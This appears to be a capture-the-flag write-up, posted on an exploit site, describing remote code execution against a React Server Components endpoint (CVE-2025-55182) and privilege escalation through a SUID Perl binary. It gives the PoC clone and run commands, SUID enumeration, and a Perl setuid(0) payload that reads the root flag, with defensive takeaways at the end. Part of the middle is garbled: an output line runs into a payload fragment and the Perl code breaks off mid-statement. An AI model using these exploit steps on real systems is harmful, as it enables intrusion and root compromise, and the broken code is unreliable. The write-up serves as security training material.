Share
## https://sploitus.com/exploit?id=786F41D1-E618-571C-BAA8-1634E7C2B789
# CVE-2025-55182 โ€” React Server Components RCE | CTF Writeup

> **Category:** Web Exploitation | **Difficulty:** Medium | **Vulnerability:** Remote Code Execution โ†’ SUID Privilege Escalation

---

## TL;DR

React Server Component endpoint vulnerable to CVE-2025-55182 (RCE) โ†’ enumerated SUID binaries โ†’ `/usr/bin/perl` had SUID set โ†’ used Perl's POSIX `setuid(0)` to escalate to root โ†’ read `/root/flag.txt`.

**Flag:** `MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}`

---

## Step 1 โ€” Reconnaissance

**Target:** `http://challenge.cybermesh.site:30035/`

The target was a React-based web application leveraging **React Server Components (RSC)** โ€” a relatively new architecture that executes components server-side and streams serialized output back to the client via a custom wire format.

This architecture introduces a server-side execution boundary. Improper input handling at that boundary is exactly what CVE-2025-55182 exploits.

---

## Step 2 โ€” Vulnerability: CVE-2025-55182

**React Server Components RCE** โ€” The server fails to sanitize user-controlled input before it reaches the server-side component execution layer. This allows an attacker to inject OS-level shell commands that execute in the context of the Node.js process.

**Attack flow:**
1. Attacker crafts a malicious RSC payload
2. Server deserializes input and passes unsanitized values into a server component function
3. OS command executes, output streamed back in the RSC response
4. Attacker reads command output from the response body

---

## Step 3 โ€” Exploit Setup

A public PoC exists for this CVE:

```bash
git clone https://github.com/surajhacx/react2shellpoc.git
cd react2shellpoc
```

Initial verification โ€” confirming RCE and execution context:

```bash
python exploit.py -t http://challenge.cybermesh.site:30035/ -c "whoami"
```

**Output:**
```
[+] EXPLOITATION SUCCESSFUL

  โ–บ app
```

The server runs as user `app`. Not root โ€” escalation required.

---

## Step 4 โ€” SUID Enumeration

Scanning for SUID binaries:

```bash
python exploit.py -t http://challenge.cybermesh.site:30035/ \
  -c "find /bin /usr/bin /sbin /usr/sbin -perm -4000 2>/dev/null || true"
```

**Output:**
```
[+] EXPLOITATION SUCCESSFUL

  โ–บ /usr/bin/gpasswd
  โ–บ /usr/bin/perl        /tmp/p.pl && /usr/bin/perl /tmp/p.pl"
```

**The payload decoded is roughly:**
```perl
use POSIX;
$ENV{PATH}='/bin:/usr/bin';
setuid(0);
open(my $vdC9flag,');
```

**Output:**
```
[+] EXPLOITATION SUCCESSFUL

  โ–บ MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}
```

---

## Flag

```
MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}
```

---

## Key Takeaways

**1. RSC attack surface is underestimated.**
React Server Components are a new paradigm. Many deployments haven't been hardened against input injection at the server-component boundary. This CVE is a reminder that "server-side rendering" isn't inherently safe โ€” the execution boundary still needs proper sanitization.

**2. SUID on scripting runtimes = instant root.**
`/usr/bin/perl` with SUID is a textbook misconfiguration. GTFOBins covers it in detail. Never set the SUID bit on scripting languages (Perl, Python, Ruby, etc.) โ€” unlike compiled binaries designed for SUID (su, passwd), these runtimes offer trivial escalation paths.

**3. The flag is self-aware.**
`SU1D_AR3_FUN_BUT_N0T_EVERYTIM3` โ€” the challenge was explicitly designed around SUID Perl as the intended escalation path. Clean chain.

---

## Attack Chain Summary

```
CVE-2025-55182 (RSC RCE)
    โ””โ”€> whoami โ†’ user "app"
    โ””โ”€> find SUID binaries
    โ””โ”€> /usr/bin/perl (SUID root) identified
    โ””โ”€> base64 Perl payload โ†’ write to /tmp/p.pl
    โ””โ”€> SUID perl /tmp/p.pl โ†’ setuid(0) โ†’ cat /root/flag.txt
    โ””โ”€> FLAG โœ“
```

---

## References

- [github.com/surajhacx/react2shellpoc](https://github.com/surajhacx/react2shellpoc)
- [GTFOBins โ€” perl SUID](https://gtfobins.github.io/gtfobins/perl/)
- [NVD โ€” CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)

---

*Written by Abdullah Maqbool โ€” Penetration Testing Engineer @ TISS | CRTA ยท CRTOM ยท CompTIA PenTest+*